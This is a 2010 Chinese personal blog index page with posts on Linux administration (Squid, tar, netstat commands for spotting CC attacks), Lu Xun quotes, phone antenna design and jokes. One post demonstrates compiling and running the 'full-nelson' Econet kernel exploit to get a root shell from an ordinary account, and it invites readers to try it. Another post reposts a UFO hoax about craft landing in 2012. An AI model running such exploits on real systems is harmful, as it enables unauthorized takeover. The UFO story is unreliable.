解决Ubuntu服务器中console-kit-daemon进程多的问题

2010-12-29 Ray Linux

这些天,在装有 Ubuntu 10.10 的服务器上装了个Lxde的桌面端,但是用起来没有命令行来的自如,就卸载了,结果在控制台中发现大量的 console-kit-daemon 进程(60多个吧)。系统资源本来就不高,结果网页请求(Nginx+php+mysql在一台小服务器上)的速度一下子就降了下来。很是郁闷。而且Google中还没有现成的中文帮助。

    经过仔细的Google后,在一大堆的E文中发现,这是桌面端的一个“快速用户切换”包造成的,但是我的系统又找不到这个包。

    后来才发现,把 consolekit 卸载了就可以了。
apt-get purge consolekit

 

阅读全文>>

评论(0) 浏览(5363)

tar命令不打包指定目录(排除目录)

2010-12-28 Ray

假如test目录结构如下

/test/aaa 目录

/test/bbb 目录

/test/ccc   目录

/test/ddd   文件

如果想将这个除aaa目录外的所有目录和文件打包到test.tar.gz ,可以使用tar命令的--exclude参数

tar zcvf test.tar.gz --exclude=/test/aaa    /test

这样就可以了。 一定要注意排除目录的最后不要带"/",否则exclude目录将不起作用

--exclude多个目录也一样,例如排除aaa和bbb目录

tar zcvf test.tar.ga --exclude=/test/aaa --exclude=test/bbb /test

阅读全文>>

标签: tar命令不打包指定目录(排除目录)

评论(0) 浏览(4017)

鲁迅知道的太多了

2010-12-26 Ray Reship

1、中国人的性情是总喜欢调和折中的,譬如你说,这屋子太暗,须在这里开一个窗,大家一定不允许的。但如果你主张拆掉屋顶他们就来调和,愿意开窗了。——《无声的中国》一九二七年

2、穷人的孩子,蓬头垢面在街上转,阔人的孩子,妖形妖势,娇声娇气的在家里转,长大了,都昏天黑地的在社会转,同他们的父亲一样,或者还不如。——《随感录二十五》一九一八年

3、中国大约太老了,社会上事无大小,都恶劣不堪,像一只黑色的染缸,无论加进甚么新东西去,都变成漆黑。可是除了再想法子来改革之外,也再没有别的路。我看一切理想家,不是怀念『过去』,就『是希望将来』,而对于『现在』这一个题目,都缴了白卷,因为谁也开不出药方。所有最好的药方即所谓『希望将来』的就是。——《两地书》一九二五年

4、我先前总以为人是有罪,所以鎗毙或坐监的。现在才知道其中的许多,是先因为被人认为『可恶』,这才终于犯了罪。——《可恶罪》一九二七年

5、无论从那里来的,只要是食物,壮健者大抵就无需思索,承认是吃的东西。惟有衰病的,却总常想到害胃,伤身,特有许多禁例,许多避忌;还有一大套比较利害而终于不得要领的理由,例如吃固无妨,而不吃尤稳,食之或当有益,然究以不吃为宜云云之类。但这一类人物总要日见其衰弱的,自己先已失了活气了。——《看镜有感》一九二五年

6、中国人的不敢正视各方面,用瞒和骗,造出奇妙的逃路来,而自以为正路。在这路上,就证明着国民性的怯弱,懒惰而又巧滑。一天一天的满足,即一天一天的堕落,但却又觉得日见其光荣。在事实上,亡国一次,即添加几个殉难的忠臣,后来每不想光复旧物,而只去赞美那几个忠臣;遭劫一次,即造成一群不辱的烈女,事过之后,也每每不思惩凶,自卫,却只顾歌咏那一群烈女。——《论睁了眼看》一九二五年

7、中国人的虽然想了各种苟活的理想乡,可惜终于没有实现。但我却替他们发现了,你们大概知道的罢,就是北京的第一监狱。这监狱在宣武门外的空地里,不怕邻家的火灾;每日两餐,不虑冻馁;起居有定,不会伤生;构造坚固,不会倒塌;禁卒管,不会再犯;强盗是决不会来抢的。住在里面,何等安全,真是『千金之子坐不垂堂』了。但缺少的就有一件事:自由。——《北京通讯》一九二五年

8、中国各处是壁,然而无形,像『鬼打墙』一般,使你随时能『碰』,能打这墙的,能碰而不感到痛苦的,是胜利者。——《碰壁之后》一九二五年

9、中国中流的家庭,教孩子大抵只有两种法。其一是任其跋扈,一点也不管,骂人固可,打人亦无不可,在门内或门前是暴主,是霸王,但到外面便如失了网的蜘蛛一般,立刻毫无能力。其二,是终日给以冷遇或呵斥,甚于打扑,使他畏葸退缩,彷佛一个奴才,一个傀儡,然而父母却美其名曰『听话』,自以为是教育的成功,待到他们外面来,则如暂出樊笼的小禽,他决不会飞鸣,也不会跳跃。——《海上的儿童》一九三三年

10、说话到真人厌恶,比毫无动静来,还是一种幸福。——《「坟」题记》一九二六年

11、战士死了的时候,苍蝇所首先发见的是他的缺点和伤痕,嘬,营营地叫,以为得意,以为比死了的战士更英雄。但是战士已经死了,不再来挥去牠们。于是乎苍蝇们即更其营营地叫,自以为倒是不朽的声音,因为牠们的完全,远在战士之上。的确的,谁也没有发见过苍蝇们的缺点和创伤。然而,有缺点的战士终竟是战士,完美的苍蝇也终竟不过是苍蝇。——《战士和苍蝇》一九二五年

12、我独不解中国人何以于旧状况那么心平气和,于较新的机运就这么疾首蹙额;于已成之局那么委曲求全;于初兴之事就这么求全责备?——《这个与那个》一九二六年

13、中国人不疑自己的多疑。——《我要骗人》一九三六年

14、群众,尤其是中国的──永远是戏剧的看客。牺牲上场,如果显得慷慨,他们就看了悲壮剧;如果显得觳觫(即恐惧颤抖),他们就看了滑稽剧。北京的羊肉铺常有几个人张嘴看剥羊,仿佛颇为愉快,人的牺牲能给他们的益处,也不过如此。而况事后走不几步,他们并这一点也就忘了。——《娜拉走后怎样》一九二六

15、我先前的攻击社会,其实也是无聊的。社会没有知道我在攻击,倘一知道,我早已死无葬身之所了……我之得以偷生者,因为他们大多数不识字,不知道,并且我的话也无效力,如一箭之入大海。否则,几条杂感,就可以送命的。民众的惩罚之心,并不下于学者和军阀。——《答有恒先生》一九二七年

16、我总觉得洋鬼子比中国人文明,货只管排,而那品性却很有可学的地方,这种敢于指摘自己国度的错误的,中国人就很少。——《两地书之廿九》一九二五年

17、在中国,尤其是在都市里,倘使路上有暴病倒地,或翻车捽摔伤的人,路人围观或甚至高兴的人尽有,有肯伸手来扶助一下的人却是极少的。——《经验》一九三三年

18、中国人自己诚然不善于战争,却并没有诅咒战争;自己诚然不愿出战,却并未同情于不愿出战的他人;虽然想到自己,却没有想到他人的自己。——《一个青年的梦译者序二》一九一九年

19、在要求天才的产生之前,应该先要求可以使天才生长的民众。──譬如想有乔木,想看好花,一定要有好土;没有土,便没有花木了;所以土实在较花木还重要。——《未有天才之前》一九二六年

20、即使艰难,也还要做;愈艰难,就愈要做。改革,是向来没有一帆风顺的,冷笑家的赞成,是在见了成功之后……——《中国语文的新生》一九三四年

21 「可惜中国人但对于羊显凶兽相,而对于凶兽则显羊相,所以即使显凶兽相,也还是卑怯的国民。这样下去,一定要完结的。」「我想,要中国得救,也不必添甚么东西进去,只要青年们将这两种性质的古传用法,反过来一用就够了;对手如凶兽时就如凶兽,对手如羊时就如羊!」——《忽然想到.七》一九二五年

22、凡中国所有的,外国也都有。外国人说中国多臭虫,但西洋也有臭虫……假使世界上只有一家有臭虫,而遭别人指摘的时候,实在也不太舒服的……最好还是希望别家也有臭虫,而竟发现了就更好。」——《外国也有》一九三三年

23、「自有历史以来,中国人是一向被同族屠戮、奴隶、敲掠、刑辱、压迫下来的,非人类所能忍受的楚痛,也都身受过,每一考查,真教人觉得不像活在人间。」——《病后杂谈之余》一九三四年

24、「从生活窘迫过来的人,一到了有钱,容易变成两种情形:一种是理想世界,替处同一境遇的人着想,便成为人道主义;一种是甚么都是自己挣起来,从前的遭遇,使他觉得甚么都是冷酷,便流为个人主义。我们中国大概是变成个人主义者多。」——《文艺与政治的歧途》一九二七年

25、「许多历史的教训,都是用极大的牺牲换来的。譬如吃东西吧,某种是毒物不能吃,我们好象全惯了,很平常了。不过,还一定是以前有多少人吃死了,才知的。所以我想,第一次吃螃蟹的人是很可佩服的,不是勇士谁敢去吃它呢?螃蟹有人吃,蜘蛛一定也有人吃过,不过不好吃,所以后人不吃了,像这种人我们当极端感谢的。」——《今天的两种感想》一九三二年

阅读全文>>

标签: 鲁迅知道的太多了

评论(2) 浏览(1836)

Squid运行调试命令及日志状态分析

2010-12-16 Ray

当你的 squid.conf 配置文档按照你的想法修改完以后,启动 squid 之旅就开始了。
Squid安装调试命令:

1,初始化你在 squid.conf 里配置的 cache 目录
#/usr/local/squid/sbin/squid -z //初始化缓存空间
如果有错误提示,请检查你的 cache目录的权限。

2,对你的squid.conf 排错,即验证 squid.conf 的 语法和配置。
#/usr/local/squid/sbin/squid -k parse
如果squid.conf 有语法或配置错误,这里会返回提示你,如果没有返回,恭喜,可以尝试启动squid。

3,在前台启动squid,并输出启动过程。
#/usr/local/squid/sbin/squid -N -d1
如果有到 ready to server reques,恭喜,启动成功。
然后 ctrl + c,停止squid,并以后台运行的方式启动它。

4,启动squid在后台运行。
#/usr/local/squid/sbin/squid -s
这时候可以 ps -A 来查看系统进程,可以看到俩个 squid 进程。

5,停止 squid
#/usr/local/squid/sbin/squid -k shutdown
这个不用解释吧。

6,重引导修改过的 squid.conf
#/usr/local/squid/sbin/squid -k reconfigure //载入新的配置文件
这个估计用的时候比较多,当你发现你的配置有不尽你意的时候,可以随时修改squid.conf,然后别忘记对你的 squid.conf排错,然后再执行此指令,即可让squid重新按照你的 squid.conf 来运行。


7./usr/local/squid/sbin/squid -k rotate 轮循日志

8,把squid添加到系统启动项
编辑 /etc/rc.d/rc.local
添加如下行: /usr/local/squid/sbin/squid -s
利用Runc脚本……..

再来点其他的。
1,修改cache 缓存目录的权限。
#chown -R squid:squid /data/cache
我的cache缓存目录是 /data/cache,squid执行用户和用户组是 squid,squid。

2,修改squid 日志目录的权限
#chown -R squid:squid /usr/local/squid/var/logs
这一步并不是适合每一个使用squid的用户.意为让squid有权限在该目录进行写操作 。
例如生成 access.log cache.log store.log

3,查看你的日志文档。
#more /usr/local/squid/var/logs/access.log | grep TCP_MEM_HIT
该指令可以看到在squid运行过程中,有那些文件被squid缓存到内存中,并返回给访问用户。
#more /usr/local/squid/var/logs/access.log | grep TCP_HIT
该指令可以看到在squid运行过程中,有那些文件被squid缓存到cache目录中,并返回给访问用户。
#more /usr/local/squid/var/logs/access.log | grep TCP_MISS
该指令可以看到在squid运行过程中,有那些文件没有被squid缓存,而是现重原始服务器获取并返回给访问用户。
关于 TCP_XXXX 等参数及代表的信息,请参看《squid中文权威指南》13.2.1 章节。
当然,本例中的蓝色文字是可以修改为其他的参数,例如你的域名 www.xxxx.com ,同样可以看到access.log里关于该域名的行。

二.squid命中率分析

/usr/local/squid/bin/squidclient -p 80 mgr:info
/usr/local/squid/bin/squidclient -p 80 mgr:5min
可以看到详细的性能情况,其中PORT是你的proxy的端口,5min可以是60min

取得squid运行状态信息: squidclient -p 80 mgr:info
*取得squid内存使用情况: squidclient -p 80 mgr:mem
*取得squid已经缓存的列表: squidclient -p 80 mgrbjects. use it carefully,it may crash
*取得squid的磁盘使用情况: squidclient -p 80 mgr:diskd
*强制更新某个url:squidclient -p 80 -m PURGE http://www.xxx.com/xxx.php
*更多的请查看:squidclient-h 或者 squidclient -p 80 mgr:

查命中率:
/usr/local/squid/bin/squidclient -h 111.222.111.111 -p80 mgr:info

/usr/local/squid/bin/squidclient -h具体的IP -p80 mgr:info

 

如果看到很多的TCP_MEM_HIT ,这表明该文件是从内存缓存读取的,squid已经起作用了!你再用浏览器打开该文件,应该是快如闪电了。。呵呵,大功告成了!还有其他类型的HIT,如TCP_HIT等等,这些是从磁盘读取的,我觉得加速的意义不大,只不过缓解了apache的压力而已。

相应于HTTP请求,下列标签可能出现在access.log文件的第四个域。

TCP_HIT

Squid发现请求资源的貌似新鲜的拷贝,并将其立即发送到客户端。

TCP_MISS

Squid没有请求资源的cache拷贝。

TCP_REFERSH_HIT

Squid发现请求资源的貌似陈旧的拷贝,并发送确认请求到原始服务器。原始服务器返回304(未修改)响应,指示squid的拷贝仍旧是新鲜的。

TCP_REF_FAIL_HIT

Squid发现请求资源的貌似陈旧的拷贝,并发送确认请求到原始服务器。然而,原始服务器响应失败,或者返回的响应Squid不能理解。在此情形下,squid发送现有cache拷贝(很可能是陈旧的)到客户端。

TCP_REFRESH_MISS

Squid发现请求资源的貌似陈旧的拷贝,并发送确认请求到原始服务器。原始服务器响应新的内容,指示这个cache拷贝确实是陈旧的。

TCP_CLIENT_REFRESH_MISS

Squid发现了请求资源的拷贝,但客户端的请求包含了Cache-Control: no-cache指令。Squid转发客户端的请求到原始服务器,强迫cache确认。

TCP_IMS_HIT

客户端发送确认请求,Squid发现更近来的、貌似新鲜的请求资源的拷贝。Squid发送更新的内容到客户端,而不联系原始服务器。

TCP_SWAPFAIL_MISS

Squid发现请求资源的有效拷贝,但从磁盘装载它失败。这时squid发送请求到原始服务器,就如同这是个cache丢失一样。

TCP_NEGATIVE_HIT

在对原始服务器的请求导致HTTP错误时,Squid也会cache这个响应。在短时间内对这些资源的重复请求,导致了否命中。 negative_ttl指令控制这些错误被cache的时间数量。请注意这些错误只在内存cache,不会写往磁盘。下列HTTP状态码可能导致否定 cache(也遵循于其他约束): 204, 305, 400, 403, 404, 405, 414, 500, 501, 502, 503, 504。

TCP_MEM_HIT

Squid在内存cache里发现请求资源的有效拷贝,并将其立即发送到客户端。注意这点并非精确的呈现了所有从内存服务的响应。例如,某些cache在内存里,但要求确认的响应,会以TCP_REFRESH_HIT, TCP_REFRESH_MISS等形式记录。

TCP_DENIED

因为http_access或http_reply_access规则,客户端的请求被拒绝了。注意被http_access拒绝的请求在第9域的值是NONE/-,然而被http_reply_access拒绝的请求,在相应地方有一个有效值。

TCP_OFFLINE_HIT

当offline_mode激活时,Squid对任何cache响应返回cache命中,而不用考虑它的新鲜程度。

TCP_REDIRECT

重定向程序告诉Squid产生一个HTTP重定向到新的URI(见11.1节)。正常的,Squid不会记录这些重定向。假如要这样做,必须在编译squid前,手工定义LOG_TCP_REDIRECTS预处理指令。

NONE

无分类的结果用于特定错误,例如无效主机名。

相应于ICP查询,下列标签可能出现在access.log文件的第四域。

UDP_HIT

Squid在cache里发现请求资源的貌似新鲜的拷贝。

UDP_MISS

Squid没有在cache里发现请求资源的貌似新鲜的拷贝。假如同一目标通过HTTP请求,就可能是个cache丢失。请对比UDP_MISS_NOFETCH。

UDP_MISS_NOFETCH

跟UDP_MISS类似,不同的是这里也指示了Squid不愿去处理相应的HTTP请求。假如使用了-Y命令行选项,Squid在启动并编译其内存索引时,会返回这个标签而不是UDP_MISS。

UDP_DENIED

因为icp_access规则,ICP查询被拒绝。假如超过95%的到某客户端的ICP响应是UDP_DENIED,并且客户端数据库激活了(见附录A),Squid在1小时内,停止发送任何ICP响应到该客户端。若这点发生,你也可在cache.log里见到一个警告。

UDP_INVALID

Squid接受到无效查询(例如截断的消息、无效协议版本、URI里的空格等)。Squid发送UDP_INVALID响应到客户端

阅读全文>>

标签: Squid运行调试命令及日志状态分析

评论(0) 浏览(4491)

3 Very Large Objects In Space Flying To Earth

2010-12-15 Ray Reship

E.T. does not need to phone home anymore, someone, or something is on it’s way to earth.

SETI Astrophysicist Craig Kasnov ( not to be confused with Craig Kasnoff ) has announced the approach to the Earth of 3 very large, very fast moving objects.  The length of the "flying saucers" is in the range of tens of kilometers.  Landing, according to calculations of scientists, should be in mid-December 2012. Date coincides with the end of the Mayan calendar.

A few very large objects rapidly approaching the Earth - says SETI astrophysicist Craig Kasnov.  Don’t take his word for it you can check it out for yourself.  He recommends to go to the site http://www.sky-map.org/ and enter the coordinates of the giant UFO:

19 25 12 -89 46 03 - the first large object
16 19 35 -88 43 10 - a cylindrical object
02 26 39 -89 43 13 - the object as a circle

The project participants are assured that the facilities are absolutely real, and the American space agency NASA is trying to conceal important information.  

None of these objects can be seen from the northern hemisphere. The second set of numbers in each line tells us that the "object" or "objects" is/are coming in from very deep in the southern hemisphere sky.

In any case, the only thing we can do now - wait for it - says Kasnov. - Soon celestial objects will be visible in a good telescope.

Keep your eyes on the skies… the truth is out there.
 

***

For more interesting U.F.O. information from the authors website, click HERE  (new window will open)

2012会不会真的是终结啊,怕怕

阅读全文>>

标签: 3 Very Large Objects In Space Flying To Earth

评论(0) 浏览(1815)

Linux 再爆 root 帐号提权漏洞

2010-12-11 Ray Reship

系统安全高手 Dan Rosenberg 发布了一段 C 程序 , 这段200多行的程序利用了 Linux Econet 协议的3个安全漏洞,可以导致本地帐号对系统进行拒绝服务或特权提升,也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell,以下在 update 过的 Ubuntu 10.04 Server LTS 上测试通过:

$ sudo apt-get update
$ sudo apt-get upgrade

$ uname -r
2.6.32-21-server

$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xffffffffa0131510
 [+] Resolved econet_ops to 0xffffffffa0131600
 [+] Resolved commit_creds to 0xffffffff8108b820
 [+] Resolved prepare_kernel_cred to 0xffffffff8108bc00
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
#

由于 RHEL/CentOS 默认不支持 Econet 协议,所以测试没有通过:

# yum update

$ uname -r
2.6.18-194.26.1.el5

$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Failed to open file descriptors.

如果在企业环境用 Ubuntu 的话可能会比较杯具了,几百个帐号里总可以找到一两个帐号被内部或外部人员通过上面这段程序拿到 root,这对服务器的危害是毁灭性的。前天还在说 Ubuntu 在内核方面无作为, 现在想起来还有点后怕。VPSee 提醒正在使用多个普通帐号登录 Ubuntu VPS 的朋友及时升级或打内核补丁,出售 VPN/SSH 帐号、提供免费 SSH 的商家尤其要小心 “客户” 捣乱,使用其他 Linux 发行版的朋友也最好检查一下自己的 VPS 有没有这些高危漏洞。

以上转自http://www.oschina.net/news/13689/linux-kernel-root-level-exploit-leveraging-multiple-previous-vulnerabilities

实践是检验真理的唯一标准,找来源码,拿来在自己的ubuntu上面做个试验,果然crack得到了root权限!!

root@ubuntu-gnome :~# adduser test  --home /home/test
正在添加用户"test"...
正在添加新组"test" (1001)...
正在添加新用户"test" (1001) 到组"test"...
创建主目录"/home/test"...
正在从"/etc/skel"复制文件...
输入新的 UNIX 口令:
重新输入新的 UNIX 口令:
passwd: password updated successfully
Changing the user information for test
Enter the new value, or press ENTER for the default
        Full Name []: test
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
这个信息是否正确? [Y/n] y
root@ubuntu-gnome :~# cd /mnt
root@ubuntu-gnome:/mnt # ls
crack_root.c.c  douban.txt  downloads  gcc  IE7-WindowsXP-x86-chs.exe  LNMP伪静态规则.rar  w.tar.gz
root@ubuntu-gnome:/mnt # chmod 777 crack_root.c.c
root@ubuntu-gnome:/mnt # su test
test@ubuntu-gnome:/mnt$ ls
crack_root.c.c douban.txt  downloads  gcc  IE7-WindowsXP-x86-chs.exe  LNMP伪静态规则.rar  w.tar.gz
test@ubuntu-gnome:/mnt$ gcc crack_root.c.c -o crack_root
test@ubuntu-gnome:/mnt$ ls
crack_root  crack_root.c.c douban.txt  downloads  gcc  IE7-WindowsXP-x86-chs.exe  LNMP伪静态规则.rar  w.tar.gz
test@ubuntu-gnome:/mnt$ ./crack_root
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xc89b2280
 [+] Resolved econet_ops to 0xc89b2360
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
#
 

顺利获得root权限!

ununtu的版本:# uname -a
Linux ubuntu-gnome 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux

 源码这里有下载,想试的话去玩玩吧,呵呵

阅读全文>>

标签: Linux 再爆 root 帐号提权漏洞

评论(4) 浏览(3069)

收了一堆netstat命令,判断CC用

2010-12-5 Ray Vhost

查看所有80端口的连接数

代码:
netstat -nat|grep -i "80"|wc -l

对连接的IP按连接数量进行排序

代码:
netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n

查看TCP连接状态

代码:
netstat -nat |awk '{print $6}'|sort|uniq -c|sort -rn
netstat -n | awk '/^tcp/ {++S[$NF]};END {for(a in S) print a, S[a]}'
netstat -n | awk '/^tcp/ {++state[$NF]}; END {for(key in state) print key,"\t",state[key]}'
netstat -n | awk '/^tcp/ {++arr[$NF]};END {for(k in arr) print k,"\t",arr[k]}'
netstat -n |awk '/^tcp/ {print $NF}'|sort|uniq -c|sort -rn
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c

查看80端口连接数最多的20个IP

代码:
netstat -anlp|grep 80|grep tcp|awk '{print $5}'|awk -F: '{print $1}'|sort|uniq -c|sort -nr|head -n20
netstat -ant |awk '/:80/{split($5,ip,":");++A[ip[1]]}END{for(i in A) print A,i}' |sort -rn|head -n20

用tcpdump嗅探80端口的访问看看谁最高

代码:
tcpdump -i eth0 -tnn dst port 80 -c 1000 | awk -F"." '{print $1"."$2"."$3"."$4}' | sort | uniq -c | sort -nr |head -20

查找较多time_wait连接

复制内容到剪贴板
代码:
netstat -n|grep TIME_WAIT|awk '{print $5}'|sort|uniq -c|sort -rn|head -n20

找查较多的SYN连接

代码:
netstat -an | grep SYN | awk '{print $5}' | awk -F: '{print $1}' | sort | uniq -c | sort -nr | more

阅读全文>>

标签: 收了一堆netstat命令,判断CC用

评论(2) 浏览(2851)

手机内置天线设计

2010-12-4 Ray Work notes

PIFA 天线基本注意:
1 ,天线空间一般要求预留空间: W (宽), L (长), H (高)其中 W ( 15-25mm )、   L ( 35-45mm )、
H ( 6-8mm) 。其中 H 和天线谐振频率的带宽密切相关。 W 、 L 决定天线的最低频率。如果天
线面积如下:
双频( GSM/DCS ): 600x6~8mm
三频( GSM/DCS/PCS ): 700x7~8mm
满足以上要求则 GSM 频段一般可能达到 -1~0dBi , DCS/PCS 可达 0~1dBi 。当然高度越高越
好,带宽性能得到保证。
2 ,内置天线尽量远离周围马达、 SPEARKER 、 RECEIVER 等较大金属物体。有时候有摄像
头出现,这时候应该把天线这块挖空,尽量作好摄像头 FPC 的屏蔽(镀银襁),否则会影响
接收灵敏度。尽量避免 PCB 上微带、引线等与天线弹片平行。
3 ,内置天线附近的结构件(面)不要有喷涂导电漆等导电物质。
4 ,手机天线附近区域不要做电镀工艺以及避免设计金属装饰件等。 有环形的金属圈就要接
地 .   装饰件,通过导电布接到入件上再接到电路板的边缘,即导地。
5 ,内置天线正上、下方不能有与 FPC 重合部分,且相互边缘距离 3mm 以上。
6 ,内置天线与手机电池的间距应在 5mm 以上。
7 ,手机 PCB 的长度对 PIFA 天线的性能有重要的影响,目前直板机 PCB 的长度在 75-105mm
之间这个水平。
8 ,馈电点的焊盘应该不小于 2x3mm ;馈电点应该靠边缘。
9 ,天线区域可适当开些定位孔!
10 ,在目前的有些超薄滑盖机中,由于天线高度不够,可以通过挖空 PIFA 天线下方的地,
然后在其背面再加一个金属片,起到一个参考地的作用,达到满足设计带宽的要求。

MONOPOLE 天线的基本注意:
内置的 MONOPOLE 天线体积稍小,性能较外置天线差。具体要求如下:
1 ,内置天线周围 3mm 内不能有马达、 SPEARKER 、 RECEIVER 等较大金属物体。
2 ,天线的宽度应该不小于 15mm 。
3 ,内置天线附近的结构件(面)不要喷涂导电漆等导电物质。
4 ,手机天线区域附近不要做电镀工艺以及避免设计金属装饰件等。
5 ,内置天线正上、下方不能有与 FPC 重合部分,且相互边缘距离 3mm 以上。
6 ,内置天线与手机电池的间距应在 5mm 以上。
7 , MONOPOLE 必须悬空,平面结构下不能有 PCB 的 Ground ,一般内置天线必须离主板
3mm (水平方向),在天线正下方到地的高度必须保持在 5mm (垂直方向)以上(如下示意
图),可以把主板天线区域的地挖空,目前在超薄的直板机上基本上是满足这个要求。
 
点击查看原图

8 ,由于 MONOPOLE 天线没有参考的地, SAR 一般比 PIFA 天线大,实际应用中受到限制

且这是测试的难点,但是效率一般比 PIFA 高。 离电池要 5mm 以上。

点击查看原图

假内置天线的注意事项:

相同的方向尽量不要有大的铜箔和密集的布线。

2 ,假内置天线的最小空间要   WxL=10x20mm ,

3 ,周围元件离天线应该尽量远些。实际上安排可参照如下: Speaker 磁性大要离天线尽量远

些,相对 Camera   磁性小些可以安排据天线近些。

4 ,假内置天线,效率不高, GSM 可以达到 31 , DCS 可以达到 25   ;如果采用陶瓷天线高

频可以达到 28 左右,但低频会降低到 27-28 左右。

点击查看原图

倒 F 天线的注意事项:

不同于 PIFA 天线的倒 F 天线,弹片如单极天线是窄片或丝线,双馈电点。此种天线的注意

如单极天线,天线必须悬空,要求天线周围 3mm 范围内不能有大的铜箔和元器件。正下方

不得有元器件。天线的最小空间要 10x40x10mm 左右。

 

 

点击查看原图

FICA 天线的注意事项 , 如右图:
 
FICA 天线一实例

 
本天线的特点是高频带宽比较大,是做三频、四频等内置天线的首选。该天线占的面积理论
上是 PIFA 天线的一半左右,可以避开大的金属元器件。该天线物理结构特点是曲折的长微
带线双条并行,保持两条微带之间的距离会对天线的参数有影响。
1 ,要求天线所占平面的下方要铺满地铜箔,并且天线正下方不能有大的元器件。
2 ,天线的高度要 6-8mm
3 ,天线的馈电点比较有特点,两个馈电点可以较远。安排馈电点的原则是在 PCB 的顶端或
边缘,两个馈电点到天线弹片的尾端长度一般要对称相等。
4 ,天线的周围机壳上的处理不要有金属饰物和导电漆。这一点是所有天线的要求。
 

阅读全文>>

标签: 手机内置天线设计

评论(0) 浏览(4069)

高手在民间,神一般的大爷!

2010-12-3 Ray

转的~~
 
一个在菜场看到的,神一般的大爷!
那大爷买西红柿来着的,挑了三个放到秤盘里,摊主秤了下说:“一斤半,三块七。”
大爷说:“我就做个汤,用不着那么多。”说完就去掉了个儿最大的那个西红柿。
摊主迅速又瞧一眼秤子,“一斤二两,三块。”
正当我看不过去想提醒大爷注意摊主的秤子时,大爷从容的掏出了七毛钱,拿起刚刚去掉的那个大的西红柿,扭头就走了……
摊主当场就凌乱了,我憋成内伤,把头扭向一边……

 

阅读全文>>

评论(1) 浏览(1785)

Powered by emlog 京ICP备05005575号